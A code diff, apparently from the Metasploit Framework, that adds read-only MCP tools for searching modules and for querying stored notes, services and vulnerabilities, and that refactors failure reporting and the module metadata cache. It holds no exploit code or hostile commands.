architectures: { type: 'array', items: { type: 'string', enum: %w[
x86 x86_64 x64 mips mipsle mipsbe mips64 mips64le ppc ppce500v2
ppc64 ppc64le cbea cbea64 sparc sparc64 armle armbe aarch64 cmd
php tty java ruby dalvik python nodejs firefox zarch r
riscv32be riscv32le riscv64be riscv64le loongarch64
] } },
platforms: { type: 'array', items: { type: 'string' } },
authors: { type: 'array', items: { type: 'string' } },
privileged: { type: 'boolean' },
has_check_method: { type: 'boolean' },
default_options: { type: 'object' },
references: { type: 'array', items: { type: ['string', 'object'] } },
targets: { type: 'object' },
default_target: { type: 'integer' },
stance: { type: 'string' },
actions: { type: 'object' },
default_action: { type: 'integer' },
options: { type: 'object' }
}
}
},
required: [:metadata, :data]
)
annotations(
read_only_hint: true,
idempotent_hint: true,
destructive_hint: false
)
meta({ source: 'metasploit_framework' })
class << self
include ToolHelper
##
# Execute module info retrieval
#
# @param type [String] Type of module
# @param name [String] Name/path of module
# @param server_context [Hash] Server context with msf_client, rate_limiter, config
# @return [MCP::Tool::Response] Structured response with module details
#
def call(type:, name:, server_context:)
start_time = Time.now
# Extract dependencies from server context
msf_client = server_context[:msf_client]
rate_limiter = server_context[:rate_limiter]
# Check rate limit
rate_limiter.check_rate_limit!('module_info')
# Validate inputs
Msf::MCP::Security::InputValidator.validate_module_type!(type)
Msf::MCP::Security::InputValidator.validate_module_name!(name)
# Call Metasploit API
raw_module_info = msf_client.module_info(type, name)
# Transform response
transformed = Metasploit::ResponseTransformer.transform_module_info(raw_module_info)
# Build metadata
metadata = {
query_time: (Time.now - start_time).round(3)
}
# Return MCP response
::MCP::Tool::Response.new(
[
{
type: 'text',
text: JSON.generate(
metadata: metadata,
data: transformed
)
}
],
structured_content: {
metadata: metadata,
data: transformed
}
)
rescue Msf::MCP::Security::RateLimitExceededError => e
tool_error_response("Rate limit exceeded: #{e.message}")
rescue Msf::MCP::Metasploit::AuthenticationError => e
tool_error_response("Authentication failed: #{e.message}")
rescue Msf::MCP::Metasploit::APIError => e
tool_error_response("Metasploit API error: #{e.message}")
rescue Msf::MCP::Security::ValidationError => e
tool_error_response(e.message)
end
end
end
end
end
+185
View File
@@ -0,0 +1,185 @@
# frozen_string_literal: true
module Msf::MCP
module Tools
##
# MCP Tool: Query Metasploit Database Notes
#
# Retrieves notes from the Metasploit database including user annotations,
# scan results, and discovery metadata.
#
class NoteInfo < ::MCP::Tool
tool_name 'msf_note_info'
description 'Query Metasploit database for notes and annotations. '\
'Returns notes including host associations and metadata.'
input_schema(
properties: {
workspace: {
type: 'string',
description: 'Workspace name (default: "default")',
default: 'default'
},
type: {
type: 'string',
description: 'Note type (e.g. "ssl.certificate", "smb.fingerprint")'
},
host: {
type: 'string',
description: 'Host IP address to filter (e.g., "192.168.1.100")'
},
ports: {
type: 'string',
description: 'Port number or range to filter (e.g., "80" or "80-443")'
},
protocol: {
type: 'string',
description: 'Protocol to filter (tcp or udp)',
enum: ['tcp', 'udp']
},
limit: {
type: 'integer',
description: 'Maximum number of results',
minimum: Msf::MCP::Security::InputValidator::LIMIT_MIN,
maximum: Msf::MCP::Security::InputValidator::LIMIT_MAX,
default: Msf::MCP::Security::InputValidator::LIMIT_DEFAULT
},
offset: {
type: 'integer',
description: 'Number of results to skip',
minimum: 0,
default: 0
}
},
required: [:workspace]
)
output_schema(
properties: {
metadata: {
properties: {
workspace: { type: 'string' },
query_time: { type: 'number' },
total_items: { type: 'integer' },
returned_items: { type: 'integer' },
limit: { type: 'integer' },
offset: { type: 'integer' }
}
},
data: {
type: 'array',
items: {
properties: {
host: { type: 'string' },
service_name_or_port: { type: 'string' },
note_type: { type: 'string' },
data: { type: 'string' },
created_at: { type: 'string' }
}
}
}
},
required: [:metadata, :data]
)
annotations(
read_only_hint: true,
idempotent_hint: true,
destructive_hint: false
)
meta({ source: 'metasploit_database' })
class << self
include ToolHelper
##
# Execute note query
#
# @param workspace [String] Workspace name (default: 'default')
# @param host [String, nil] Host IP address to filter
# @param type [String, nil] Note type to filter
# @param ports [String, nil] Port or port range to filter
# @param protocol [String, nil] Protocol to filter (tcp or udp)
# @param limit [Integer] Maximum results (default: 100)
# @param offset [Integer] Results offset (default: 0)
# @param server_context [Hash] Server context with msf_client, rate_limiter, config
# @return [MCP::Tool::Response] Structured response with note information
#
def call(workspace: 'default', host: nil, type: nil, ports: nil, protocol: nil, limit: Msf::MCP::Security::InputValidator::LIMIT_DEFAULT, offset: 0, server_context:)
start_time = Time.now
# Extract dependencies from server context
msf_client = server_context[:msf_client]
rate_limiter = server_context[:rate_limiter]
# Check rate limit
rate_limiter.check_rate_limit!('note_info')
# Validate inputs
Msf::MCP::Security::InputValidator.validate_pagination!(limit, offset)
Msf::MCP::Security::InputValidator.validate_protocol!(protocol) if protocol
Msf::MCP::Security::InputValidator.validate_ip_address!(host) if host
Msf::MCP::Security::InputValidator.validate_port_range!(ports) if ports
# Call Metasploit API
# Note that `workspace` is optional in the MSF API, the default workspace is used if not provided.
# The default value is sent anyway for clarity.
options = { workspace: workspace }
options[:address] = host if host
options[:ntype] = type if type
options[:ports] = ports if ports
options[:proto] = protocol if protocol
raw_notes = msf_client.db_notes(options)
# Transform response
transformed = Metasploit::ResponseTransformer.transform_notes(raw_notes)
# Apply pagination
#
# Note that to get the total number of entries, we gather the entire data set and apply pagination here
# instead of sending the limit and offset to the API call to be processed by MSF.
# This is needed to provide accurate total_items count in the metadata.
total_items = transformed.size
paginated_data = transformed[offset, limit] || []
# Build metadata
metadata = {
workspace: workspace,
query_time: (Time.now - start_time).round(3),
total_items: total_items,
returned_items: paginated_data.size,
limit: limit,
offset: offset
}
# Return MCP response
::MCP::Tool::Response.new(
[
{
type: 'text',
text: JSON.generate(
metadata: metadata,
data: paginated_data
)
}
],
structured_content: {
metadata: metadata,
data: paginated_data
}
)
rescue Msf::MCP::Security::RateLimitExceededError => e
tool_error_response("Rate limit exceeded: #{e.message}")
rescue Msf::MCP::Metasploit::AuthenticationError => e
tool_error_response("Authentication failed: #{e.message}")
rescue Msf::MCP::Metasploit::APIError => e
tool_error_response("Metasploit API error: #{e.message}")
rescue Msf::MCP::Security::ValidationError => e
tool_error_response(e.message)
end
end
end
end
end
+158
View File
@@ -0,0 +1,158 @@
# frozen_string_literal: true
module Msf::MCP
module Tools
##
# MCP Tool: Search Metasploit Modules
#
# Searches the Metasploit Framework module database using various criteria.
# Supports keyword search, filtering by type, platform, and pagination.
#
class SearchModules < ::MCP::Tool
tool_name 'msf_search_modules'
description 'Search Metasploit modules according to generic search terms or specific criteria. '\
'Returns a list of modules matching the search criteria.'
input_schema(
properties: {
# TODO: improve search criteria by adding the supported key/value pair.
# The API support things like `type:exploit platform:windows cve:CVE-2021-34527`
# Maybe adding specific fields for type, platform, cve, etc.
query: {
type: 'string',
description: 'Search query (keywords, module names, or CVE IDs)',
minLength: 1,
maxLength: 500
},
limit: {
type: 'integer',
description: 'Maximum number of results to return',
minimum: Msf::MCP::Security::InputValidator::LIMIT_MIN,
maximum: Msf::MCP::Security::InputValidator::LIMIT_MAX,
default: Msf::MCP::Security::InputValidator::LIMIT_DEFAULT
},
offset: {
type: 'integer',
description: 'Number of results to skip (for pagination)',
minimum: 0,
default: 0
}
},
required: [:query]
)
output_schema(
properties: {
metadata: {
properties: {
query: { type: 'string' },
query_time: { type: 'number' },
total_items: { type: 'integer' },
returned_items: { type: 'integer' },
limit: { type: 'integer' },
offset: { type: 'integer' }
}
},
data: {
type: 'array',
items: {
properties: {
fullname: { type: 'string' },
type: { type: 'string' },
name: { type: 'string' },
rank: { type: 'string' },
disclosure_date: { type: 'string' }
}
}
}
},
required: [:metadata, :data]
)
annotations(
read_only_hint: true,
idempotent_hint: true,
destructive_hint: false
)
meta({ source: 'metasploit_framework' })
class << self
include ToolHelper
##
# Execute module search
#
# @param query [String] Search query
# @param limit [Integer] Maximum results (default: 100)
# @param offset [Integer] Results offset (default: 0)
# @param server_context [Hash] Server context with msf_client, rate_limiter, config
# @return [MCP::Tool::Response] Structured response with search results
#
def call(query:, limit: Msf::MCP::Security::InputValidator::LIMIT_DEFAULT, offset: 0, server_context:)
start_time = Time.now
# Extract dependencies from server context
msf_client = server_context[:msf_client]
rate_limiter = server_context[:rate_limiter]
# Check rate limit
rate_limiter.check_rate_limit!('search_modules')
# Validate inputs
Msf::MCP::Security::InputValidator.validate_search_query!(query)
Msf::MCP::Security::InputValidator.validate_pagination!(limit, offset)
# Call Metasploit API
raw_modules = msf_client.search_modules(query)
# Transform response
transformed = Metasploit::ResponseTransformer.transform_modules(raw_modules)
# Apply pagination
#
# Note that to get the total number of entries, we gather the entire data set and apply pagination here
# instead of sending the limit and offset to the API call to be processed by MSF.
# This is needed to provide accurate total_items count in the metadata.
total_items = transformed.size
paginated_data = transformed[offset, limit] || []
# Build metadata
metadata = {
query: query,
query_time: (Time.now - start_time).round(3),
total_items: total_items,
returned_items: paginated_data.size,
limit: limit,
offset: offset
}
# Return MCP response
::MCP::Tool::Response.new(
[
{
type: 'text',
text: JSON.generate(
metadata: metadata,
data: paginated_data
)
}
],
structured_content: {
metadata: metadata,
data: paginated_data
}
)
rescue Msf::MCP::Security::RateLimitExceededError => e
tool_error_response("Rate limit exceeded: #{e.message}")
rescue Msf::MCP::Metasploit::AuthenticationError => e
tool_error_response("Authentication failed: #{e.message}")
rescue Msf::MCP::Metasploit::APIError => e
tool_error_response("Metasploit API error: #{e.message}")
rescue Msf::MCP::Security::ValidationError => e
tool_error_response(e.message)
end
end
end
end
end
+197
View File
@@ -0,0 +1,197 @@
# frozen_string_literal: true
module Msf::MCP
module Tools
##
# MCP Tool: Query Metasploit Database Services
#
# Retrieves service information from the Metasploit database including
# ports, protocols, and service banners.
#
class ServiceInfo < ::MCP::Tool
tool_name 'msf_service_info'
description 'Query Metasploit database for discovered services. '\
'Returns service information including ports, protocols, and banners.'
input_schema(
properties: {
workspace: {
type: 'string',
description: 'Workspace name (default: "default")',
default: 'default'
},
names: {
type: 'string',
description: 'Comma-separated service names to filter (e.g., "http,https,ssh")'
},
host: {
type: 'string',
description: 'Host IP address (e.g., "192.168.1.100")'
},
ports: {
type: 'string',
description: 'Port number or range to filter (e.g., "80" or "80-443")'
},
protocol: {
type: 'string',
description: 'Protocol to filter (tcp or udp)',
enum: ['tcp', 'udp']
},
only_up: {
type: 'boolean',
description: 'Filter to only return services on hosts that are up',
default: false
},
limit: {
type: 'integer',
description: 'Maximum number of results',
minimum: Msf::MCP::Security::InputValidator::LIMIT_MIN,
maximum: Msf::MCP::Security::InputValidator::LIMIT_MAX,
default: Msf::MCP::Security::InputValidator::LIMIT_DEFAULT
},
offset: {
type: 'integer',
description: 'Number of results to skip',
minimum: 0,
default: 0
}
},
required: [:workspace]
)
output_schema(
properties: {
metadata: {
properties: {
workspace: { type: 'string' },
query_time: { type: 'number' },
total_items: { type: 'integer' },
returned_items: { type: 'integer' },
limit: { type: 'integer' },
offset: { type: 'integer' }
}
},
data: {
type: 'array',
items: {
properties: {
host_address: { type: 'string' },
created_at: { type: 'string' },
updated_at: { type: 'string' },
port: { type: 'integer' },
protocol: { type: 'string' },
state: { type: 'string' },
name: { type: 'string' },
info: { type: 'string' }
}
}
}
},
required: [:metadata, :data]
)
annotations(
read_only_hint: true,
idempotent_hint: true,
destructive_hint: false
)
meta({ source: 'metasploit_database' })
class << self
include ToolHelper
##
# Execute service query
#
# @param workspace [String] Workspace name (default: 'default')
# @param names [String, nil] Comma-separated service names to filter
# @param ports [String, nil] Port number or range to filter
# @param host [String, nil] Host IP address
# @param protocol [String, nil] Protocol to filter (tcp or udp)
# @param only_up [Boolean] Filter to only return services on hosts that are up
# @param limit [Integer] Maximum results (default: 100)
# @param offset [Integer] Results offset (default: 0)
# @param server_context [Hash] Server context with msf_client, rate_limiter, config
# @return [MCP::Tool::Response] Structured response with service information
#
def call(workspace: 'default', names: nil, ports: nil, host: nil, protocol: nil, only_up: false, limit: Msf::MCP::Security::InputValidator::LIMIT_DEFAULT, offset: 0, server_context:)
start_time = Time.now
# Extract dependencies from server context
msf_client = server_context[:msf_client]
rate_limiter = server_context[:rate_limiter]
# Check rate limit
rate_limiter.check_rate_limit!('service_info')
# Validate inputs
Msf::MCP::Security::InputValidator.validate_pagination!(limit, offset)
Msf::MCP::Security::InputValidator.validate_only_up!(only_up)
Msf::MCP::Security::InputValidator.validate_protocol!(protocol) if protocol
Msf::MCP::Security::InputValidator.validate_ip_address!(host) if host
Msf::MCP::Security::InputValidator.validate_port_range!(ports) if ports
# Call Metasploit API
# Note that `workspace` is optional in the MSF API, the default workspace is used if not provided.
# The default value is sent anyway for clarity.
options = { workspace: workspace }
options[:only_up] = only_up if only_up
options[:proto] = protocol if protocol
# The API is misleading, it only supports a single address filter, not multiple.
options[:addresses] = host if host
options[:ports] = ports if ports
options[:names] = names if names
raw_services = msf_client.db_services(options)
# Transform response
transformed = Metasploit::ResponseTransformer.transform_services(raw_services)
# Apply pagination
#
# Note that to get the total number of entries, we gather the entire data set and apply pagination here
# instead of sending the limit and offset to the API call to be processed by MSF.
# This is needed to provide accurate total_items count in the metadata.
total_items = transformed.size
paginated_data = transformed[offset, limit] || []
# Build metadata
metadata = {
workspace: workspace,
query_time: (Time.now - start_time).round(3),
total_items: total_items,
returned_items: paginated_data.size,
limit: limit,
offset: offset
}
# Return MCP response
::MCP::Tool::Response.new(
[
{
type: 'text',
text: JSON.generate(
metadata: metadata,
data: paginated_data
)
}
],
structured_content: {
metadata: metadata,
data: paginated_data
}
)
rescue Msf::MCP::Security::RateLimitExceededError => e
tool_error_response("Rate limit exceeded: #{e.message}")
rescue Msf::MCP::Metasploit::AuthenticationError => e
tool_error_response("Authentication failed: #{e.message}")
rescue Msf::MCP::Metasploit::APIError => e
tool_error_response("Metasploit API error: #{e.message}")
rescue Msf::MCP::Security::ValidationError => e
tool_error_response(e.message)
end
end
end
end
end
+27
View File
@@ -0,0 +1,27 @@
# frozen_string_literal: true
module Msf::MCP
module Tools
##
# Shared helper methods for MCP tools.
#
# Provides a standard way to build error responses that comply with the
# MCP protocol, returning a normal result with `isError: true` instead
# of raising exceptions that the MCP server would wrap as internal errors.
#
module ToolHelper
##
# Build a standard MCP error response.
#
# @param message [String] Human-readable error message
# @return [::MCP::Tool::Response] Response with isError flag set
#
def tool_error_response(message)
::MCP::Tool::Response.new(
[{ type: 'text', text: message }],
error: true
)
end
end
end
end
@@ -0,0 +1,189 @@
# frozen_string_literal: true
module Msf::MCP
module Tools
##
# MCP Tool: Query Metasploit Database Vulnerabilities
#
# Retrieves vulnerability information from the Metasploit database including
# CVE IDs, affected hosts, and vulnerability details.
#
class VulnerabilityInfo < ::MCP::Tool
tool_name 'msf_vulnerability_info'
description 'Query Metasploit database for discovered vulnerabilities. '\
'Returns vulnerability information including CVE IDs and affected hosts.'
input_schema(
properties: {
workspace: {
type: 'string',
description: 'Workspace name (default: "default")',
default: 'default'
},
names: {
type: 'array',
items: {
type: 'string',
description: 'Exploit that reported the vulnerability. It needs to be the exact module name, case sensitive, not the path (e.g. "SSH User Code Execution" or "WebEx Local Service Permissions Exploit").'
}
},
host: {
type: 'string',
description: 'Host IP address to filter (e.g., "192.168.1.100")'
},
ports: {
type: 'string',
description: 'Port number or range to filter (e.g., "80" or "80-443")'
},
protocol: {
type: 'string',
description: 'Protocol to filter (tcp or udp)',
enum: ['tcp', 'udp']
},
limit: {
type: 'integer',
description: 'Maximum number of results',
minimum: Msf::MCP::Security::InputValidator::LIMIT_MIN,
maximum: Msf::MCP::Security::InputValidator::LIMIT_MAX,
default: Msf::MCP::Security::InputValidator::LIMIT_DEFAULT
},
offset: {
type: 'integer',
description: 'Number of results to skip',
minimum: 0,
default: 0
}
},
required: [:workspace]
)
output_schema(
properties: {
metadata: {
properties: {
workspace: { type: 'string' },
query_time: { type: 'number' },
total_items: { type: 'integer' },
returned_items: { type: 'integer' },
limit: { type: 'integer' },
offset: { type: 'integer' }
}
},
data: {
type: 'array',
items: {
properties: {
host: { type: 'string' },
port: { type: 'integer' },
protocol: { type: 'string' },
name: { type: 'string' },
references: { type: 'array', items: { type: 'string' } },
created_at: { type: 'string' }
}
}
}
},
required: [:metadata, :data]
)
annotations(
read_only_hint: true,
idempotent_hint: true,
destructive_hint: false
)
meta({ source: 'metasploit_database' })
class << self
include ToolHelper
##
# Execute vulnerability query
#
# @param workspace [String] Workspace name (default: 'default')
# @param host [String, nil] Host IP address to filter
# @param names [Array<String>, nil] Exploit names to filter
# @param ports [String, nil] Port or port range to filter
# @param protocol [String, nil] Protocol to filter (tcp or udp)
# @param limit [Integer] Maximum results (default: 100)
# @param offset [Integer] Results offset (default: 0)
# @param server_context [Hash] Server context with msf_client, rate_limiter, config
# @return [MCP::Tool::Response] Structured response with vulnerability information
#
def call(workspace: 'default', host: nil, names: nil, ports: nil, protocol: nil, limit: Msf::MCP::Security::InputValidator::LIMIT_DEFAULT, offset: 0, server_context:)
start_time = Time.now
# Extract dependencies from server context
msf_client = server_context[:msf_client]
rate_limiter = server_context[:rate_limiter]
# Check rate limit
rate_limiter.check_rate_limit!('vulnerability_info')
# Validate inputs
Msf::MCP::Security::InputValidator.validate_pagination!(limit, offset)
Msf::MCP::Security::InputValidator.validate_protocol!(protocol) if protocol
Msf::MCP::Security::InputValidator.validate_ip_address!(host) if host
Msf::MCP::Security::InputValidator.validate_port_range!(ports) if ports
# Call Metasploit API
# Note that `workspace` is optional in the MSF API, the default workspace is used if not provided.
# The default value is sent anyway for clarity.
options = { workspace: workspace }
options[:address] = host if host
options[:names] = names.join(',') if names && names.is_a?(Array) && names.any?
options[:ports] = ports if ports
options[:proto] = protocol if protocol
raw_vulns = msf_client.db_vulns(options)
# Transform response
transformed = Metasploit::ResponseTransformer.transform_vulns(raw_vulns)
# Apply pagination
#
# Note that to get the total number of entries, we gather the entire data set and apply pagination here
# instead of sending the limit and offset to the API call to be processed by MSF.
# This is needed to provide accurate total_items count in the metadata.
total_items = transformed.size
paginated_data = transformed[offset, limit] || []
# Build metadata
metadata = {
workspace: workspace,
query_time: (Time.now - start_time).round(3),
total_items: total_items,
returned_items: paginated_data.size,
limit: limit,
offset: offset
}
# Return MCP response
::MCP::Tool::Response.new(
[
{
type: 'text',
text: JSON.generate(
metadata: metadata,
data: paginated_data
)
}
],
structured_content: {
metadata: metadata,
data: paginated_data
}
)
rescue Msf::MCP::Security::RateLimitExceededError => e
tool_error_response("Rate limit exceeded: #{e.message}")
rescue Msf::MCP::Metasploit::AuthenticationError => e
tool_error_response("Authentication failed: #{e.message}")
rescue Msf::MCP::Metasploit::APIError => e
tool_error_response("Metasploit API error: #{e.message}")
rescue Msf::MCP::Security::ValidationError => e
tool_error_response(e.message)
end
end
end
end
end
+128 -1
View File
@@ -39,6 +39,23 @@ module Msf::Module::Failure
# The exploit was interrupted by the user
UserInterrupt = 'user-interrupt'
# Map a {Msf::Exploit::CheckCode} to the corresponding fail_reason constant.
#
# @param check_code [Msf::Exploit::CheckCode]
# @return [String, nil] a Failure constant, or nil if unmapped
def self.fail_reason_from_check_code(check_code)
return nil unless check_code.respond_to?(:code)
case check_code.code
when Msf::Exploit::CheckCode::Vulnerable.code, Msf::Exploit::CheckCode::Appears.code
None
when Msf::Exploit::CheckCode::Safe.code
NotVulnerable
when Msf::Exploit::CheckCode::Detected.code, Msf::Exploit::CheckCode::Unknown.code
Unknown
end
end
def report_failure
return unless framework.db and framework.db.active
@@ -55,6 +72,14 @@ module Msf::Module::Failure
}
info[:target_name] = self.target.name if self.respond_to?(:target)
# Enrich attempt data with check result details when available
if self.respond_to?(:check_code) && self.check_code.is_a?(Msf::Exploit::CheckCode)
info[:check_code] = self.check_code.code
info[:check_detail] = self.check_code.reason || self.check_code.message
mapped_reason = Msf::Module::Failure.fail_reason_from_check_code(self.check_code)
info[:fail_reason] = mapped_reason if mapped_reason
end
if self.datastore['RHOST'] && (self.options['RHOST'] || self.options['RHOSTS'])
# Only include RHOST if it's a single valid host, not a multi-value string or file path
rhost = self.datastore['RHOST'].to_s
@@ -63,15 +88,117 @@ module Msf::Module::Failure
info[:host] = rhost
end
end
if self.datastore['RPORT'] and self.options['RPORT']
info[:port] = self.datastore['RPORT']
if self.class.ancestors.include?(Msf::Exploit::Remote::Tcp)
info[:proto] = 'tcp'
elsif self.class.ancestors.include?(Msf::Exploit::Remote::Udp)
info[:proto] = 'udp'
end
end
# When the check identified a vulnerability, ensure the vuln record exists
# before report_exploit_failure tries to look it up. The UI-level
# check_simple also calls report_vuln, but that happens *after* this
# ensure block, so the vuln wouldn't exist yet for the attempt lookup.
if info[:host] && self.respond_to?(:check_code) &&
self.check_code.is_a?(Msf::Exploit::CheckCode) &&
[Msf::Exploit::CheckCode::Vulnerable, Msf::Exploit::CheckCode::Appears].include?(self.check_code)
vuln_info = if self.check_code == Msf::Exploit::CheckCode::Appears
"Target appears vulnerable based on check of #{self.fullname}."
else
"Vulnerability confirmed by check of #{self.fullname}."
end
vuln_opts = {
workspace: info[:workspace],
host: info[:host],
name: self.name,
refs: self.references,
info: vuln_info
}
# Include port so that checks against different ports on the same
# host create distinct vuln records instead of collapsing into one.
vuln_opts[:port] = info[:port] if info[:port]
vuln_opts[:proto] = info[:proto] if info[:proto]
framework.db.report_vuln(vuln_opts)
end
# Skip creating a duplicate vuln attempt if one was already recorded
# during this run (e.g. by Auxiliary::Report#report_vuln). When a
# check_code is available, update the existing attempt so it carries the
# check result details (the attempt created by report_vuln may not have
# had the check_code yet because it runs before job_run_proc stores it).
if self.respond_to?(:last_vuln_attempt) && self.last_vuln_attempt
if self.respond_to?(:check_code) && self.check_code.is_a?(Msf::Exploit::CheckCode)
_enrich_existing_vuln_attempt(info, self.last_vuln_attempt)
end
info[:skip_vuln_attempt] = true
end
framework.db.report_exploit_failure(info)
end
private
# Update the VulnAttempt for this module/host with check code details that
# were not available when report_vuln originally created it.
#
# @param info [Hash] enrichment data built by report_failure
# @param recorded_attempt [Mdm::VulnAttempt, true] the attempt object stored
# by report_vuln, or +true+ if only the flag was propagated (legacy/fallback).
def _enrich_existing_vuln_attempt(info, recorded_attempt = nil)
return unless framework.db&.active
# Use the stored attempt directly when available — avoids a racy
# re-query that could match the wrong row under concurrency.
attempt = recorded_attempt if recorded_attempt.is_a?(::Mdm::VulnAttempt)
# Fallback: re-query if we only have the boolean flag (e.g. propagated
# through a replicant that only forwarded +true+).
if attempt.nil?
host = info[:host]
return unless host
host_obj = if host.is_a?(::Mdm::Host)
host
else
wspace = info[:workspace] || framework.db.find_workspace(workspace)
framework.db.get_host(workspace: wspace, address: host.to_s)
end
return unless host_obj
scope = ::Mdm::VulnAttempt
.joins(:vuln)
.where(module: fullname, vulns: { host_id: host_obj.id })
# Narrow by service attributes when available so we don't match an
# attempt against a different service on the same host (e.g. port 80
# vs 9200, or TCP vs UDP on the same port).
if info[:port]
service_conditions = { port: info[:port] }
service_conditions[:proto] = info[:proto].to_s.downcase if info[:proto]
scope = scope.joins(vuln: :service)
.where(services: service_conditions)
end
attempt = scope.order(attempted_at: :desc).first
end
return unless attempt
updates = {}
updates[:check_code] = info[:check_code] if info[:check_code] && attempt.check_code.blank?
updates[:check_detail] = info[:check_detail] if info[:check_detail] && attempt.check_detail.blank?
mapped_reason = Msf::Module::Failure.fail_reason_from_check_code(check_code)
updates[:fail_reason] = mapped_reason if mapped_reason && attempt.fail_reason == 'Untried'
# Clear the placeholder fail_detail set by report_vuln when we have a
# real check result.
updates[:fail_detail] = nil if updates[:fail_reason] && attempt.fail_detail == 'vulnerability identified'
attempt.update(updates) if updates.any?
rescue ::StandardError => e
elog('Failed to enrich vuln attempt with check code', error: e)
end
end
+6 -4
View File
@@ -177,7 +177,7 @@ module Msf::ModuleManager::Cache
reference_name = module_metadata.ref_name
# Skip cached modules that are not in our allowed load paths
next if allowed_paths.select{|x| path.index(x) == 0}.empty?
next unless allowed_paths.any? { |x| path.start_with?(x) }
parent_path = get_parent_path(path, type)
@@ -207,8 +207,10 @@ module Msf::ModuleManager::Cache
end
def get_parent_path(module_path, type)
# The load path is assumed to be the next level above the type directory
type_dir = File.join('', Mdm::Module::Detail::DIRECTORY_BY_TYPE[type], '')
module_path.split(type_dir)[0..-2].join(type_dir) # TODO: rewrite
# The load path is the directory above the type directory (e.g. everything
# before "/exploits/" in the module's absolute path).
type_dir = "#{File::SEPARATOR}#{Mdm::Module::Detail::DIRECTORY_BY_TYPE[type]}#{File::SEPARATOR}"
idx = module_path.rindex(type_dir)
idx ? module_path[0, idx] : module_path
end
end
+3 -5
View File
@@ -42,15 +42,13 @@ class Msf::Modules::Loader::Directory < Msf::Modules::Loader::Base
next unless ::File.directory?(full_entry_path) && module_manager.type_enabled?(type)
full_entry_pathname = Pathname.new(full_entry_path)
type_dir_prefix = "#{full_entry_path}#{::File::SEPARATOR}"
# Try to load modules from all the files in the supplied path
Rex::Find.find(full_entry_path) do |entry_descendant_path|
if module_path?(entry_descendant_path)
entry_descendant_pathname = Pathname.new(entry_descendant_path)
relative_entry_descendant_pathname = entry_descendant_pathname.relative_path_from(full_entry_pathname)
relative_entry_descendant_path = relative_entry_descendant_pathname.to_s
next if File::basename(relative_entry_descendant_path).start_with?('example')
relative_entry_descendant_path = entry_descendant_path.delete_prefix(type_dir_prefix)
next if ::File.basename(relative_entry_descendant_path).start_with?('example')
# The module_reference_name doesn't have a file extension
module_reference_name = module_reference_name_from_path(relative_entry_descendant_path)
+36 -10
View File
@@ -78,6 +78,9 @@ class Cache
end
end
end
if has_changes
rebuild_type_cache
end
}
if has_changes
update_store
@@ -89,8 +92,8 @@ class Cache
def module_metadata(type)
@mutex.synchronize do
wait_for_load
# TODO: Should probably figure out a way to cache this
@module_metadata_cache.filter_map { |_, metadata| [metadata.ref_name, metadata] if metadata.type == type }.to_h
type_hash = @metadata_type_index[type]
type_hash ? type_hash.dup : {}
end
end
@@ -129,7 +132,9 @@ class Cache
module_metadata.ref_name.eql? module_name
}
return old_cache_size != @module_metadata_cache.size
removed = old_cache_size != @module_metadata_cache.size
rebuild_type_cache if removed
removed
end
def wait_for_load
@@ -141,29 +146,50 @@ class Cache
# Remove all instances of modules pointing to the same path. This prevents stale data hanging
# around when modules are incorrectly typed (eg: Auxiliary that should be Exploit)
had_type_mismatch_deletion = false
@module_metadata_cache.delete_if {|_, module_metadata|
module_metadata.path.eql? metadata_obj.path && module_metadata.type != module_metadata.type
is_stale = module_metadata.path.eql?(metadata_obj.path) && module_metadata.type != metadata_obj.type
had_type_mismatch_deletion = true if is_stale
is_stale
}
@module_metadata_cache[get_cache_key(module_instance)] = metadata_obj
cache_key = get_cache_key(module_instance)
@module_metadata_cache[cache_key] = metadata_obj
if had_type_mismatch_deletion
# Type changed - full rebuild needed since we removed entries from other type buckets
rebuild_type_cache
else
# Common case - just update the single entry in the type index
type_hash = (@metadata_type_index[metadata_obj.type] ||= {})
type_hash[metadata_obj.ref_name] = metadata_obj
end
end
def get_cache_key(module_instance)
key = ''
key << (module_instance.type.nil? ? '' : module_instance.type)
key << '_'
key << module_instance.class.refname
return key
"#{module_instance.type}_#{module_instance.class.refname}"
end
# Rebuild the per-type index from the main cache.
def rebuild_type_cache
by_type = {}
@module_metadata_cache.each_value do |metadata|
type_hash = (by_type[metadata.type] ||= {})
type_hash[metadata.ref_name] = metadata
end
@metadata_type_index = by_type
end
def initialize
super
@mutex = Mutex.new
@module_metadata_cache = {}
@metadata_type_index = {}
@store_loaded = false
@console = Rex::Ui::Text::Output::Stdio.new
@load_thread = Thread.new {
init_store
rebuild_type_cache
@store_loaded = true
}
end
+70 -20
View File
@@ -8,6 +8,63 @@ module Modules
module Metadata
class Obj
# Frozen shared objects to avoid allocating duplicate empty containers
EMPTY_ARRAY = [].freeze
EMPTY_HASH = {}.freeze
# PlatformList cache to avoid re-parsing identical platform strings
@platform_list_cache = {}
class << self
# Deduplicate a string via Ruby's built-in frozen string table (fstring).
# Identical string contents will share a single frozen object in memory,
# reducing heap usage for highly repeated values like type, platform, arch, and author.
# @param str [String, nil] the string to intern
# @return [String, nil] a frozen, deduplicated copy of the string, or nil
def dedup_string(str)
return str unless str.is_a?(String)
-str
end
# Retrieve or build a cached PlatformList for the given platform string.
# @param platform_string [String, nil]
# @return [Msf::Module::PlatformList, nil]
def cached_platform_list(platform_string)
return nil if platform_string.nil?
@platform_list_cache[platform_string] ||= build_platform_list(platform_string)
end
# Deduplicate notes hash keys and string values via the frozen string table.
# Keys like "Stability", "SideEffects", "Reliability" repeat across thousands
# of modules; values like "crash-safe", "ioc-in-logs" repeat hundreds of times.
def dedup_notes(notes)
notes.each_with_object({}) do |(k, v), h|
h[-k] = case v
when Array
v.map { |e| e.is_a?(String) ? -e : e }
when String
-v
else
v
end
end
end
private
def build_platform_list(platform_string)
if platform_string.casecmp?('All')
platforms = ['']
else
platforms = platform_string.split(',')
end
pl = Msf::Module::PlatformList.transform(platforms)
pl.platforms.freeze
pl.freeze
end
end
# @return [Hash]
attr_reader :actions
# @return [String]
@@ -216,7 +273,7 @@ class Obj
def path
if @is_install_path
return ::File.join(Msf::Config.install_root, @path)
return @full_path ||= ::File.join(Msf::Config.install_root, @path)
end
@path
@@ -230,26 +287,31 @@ class Obj
@actions = obj_hash['actions']
@name = obj_hash['name']
@fullname = obj_hash['fullname']
@aliases = obj_hash['aliases'] || []
@aliases = obj_hash['aliases']
@aliases = (@aliases.nil? || @aliases.empty?) ? EMPTY_ARRAY : @aliases
@disclosure_date = obj_hash['disclosure_date'].nil? ? nil : Time.parse(obj_hash['disclosure_date'])
@rank = obj_hash['rank']
@type = obj_hash['type']
@type = Obj.dedup_string(obj_hash['type'])
@description = obj_hash['description']
